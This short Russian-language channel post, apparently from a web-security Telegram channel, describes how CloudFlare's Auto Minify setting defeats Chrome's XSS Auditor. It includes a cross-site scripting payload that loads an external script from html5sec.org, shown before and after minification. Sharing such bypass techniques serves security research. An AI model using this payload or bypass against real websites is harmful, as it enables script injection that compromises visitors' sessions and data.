Обложка канала

Кавычка

9725 @webpwn

Ломать - не строить

Кавычка

9 лет назад
Открыть в
Не все йогурты одинаково полезны!

Например, настройка в CloudFlare по сжатию страницы ломает Chrome XSS Auditor, что позволяет с легкостью его обойти. Достаточно указать вектор, в котором содержимое атрибутов не будет обрамлено кавычками, Auto Minify CloudFlare все сделает за тебя, а Chrome не увидит, что вектор атаки передался в URL, так как содержимое на странице будет различаться от того, что было передано в запросе.

<script/src=//html5sec.org/test.js></script>

вжух =>
<script src="//html5sec.org/test.js"></script>


https://twitter.com/i_bo0om/status/895896778914004993